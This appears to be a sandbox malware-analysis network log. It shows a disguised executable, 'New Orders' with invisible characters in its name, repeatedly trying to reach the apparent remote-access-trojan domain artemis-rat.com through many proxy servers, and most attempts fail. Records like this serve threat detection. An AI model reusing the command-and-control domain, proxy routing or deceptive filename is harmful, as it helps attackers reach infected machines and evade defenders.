                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.445416927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.648484945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.132759094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632793903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.113687992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.945192099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.444988012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1639192.168.2.954634213.171.35.66180007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.171320915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.597975016 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1640192.168.2.954621104.247.163.246540947672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.173121929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.976504087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070847988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.164069891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.273379087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.460850954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.664248943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.773133039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.976330996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1641192.168.2.953837110.34.3.22931287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.173124075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.866688013 CET525INHTTP/1.1 502 Proxy Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:48 GMT
                                                                                        Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1o
                                                                                        Content-Length: 348
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1642192.168.2.95461294.177.106.17823247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.175057888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.535604954 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.22.1
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1643192.168.2.954738107.180.88.41375977672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.175527096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.773281097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.477597952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773880959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1644192.168.2.954587190.2.110.741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.177484989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1645192.168.2.954655124.105.55.176309067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.179770947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1646192.168.2.95320213.81.217.201807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.180118084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.231781960 CET810INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:49 GMT
                                                                                        Server: Apache/2.4.29 (Ubuntu)
                                                                                        Content-Length: 618
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1647192.168.2.95212069.61.200.104361817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.181154013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1648192.168.2.95466449.13.163.13131287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.181556940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.976413965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.880939960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.773749113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.460966110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1649192.168.2.954821104.20.67.113807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.181569099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.336136103 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1650192.168.2.95482245.14.174.180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.181906939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.336276054 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1651192.168.2.953198162.55.87.4855667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:47.202441931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.438127995 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
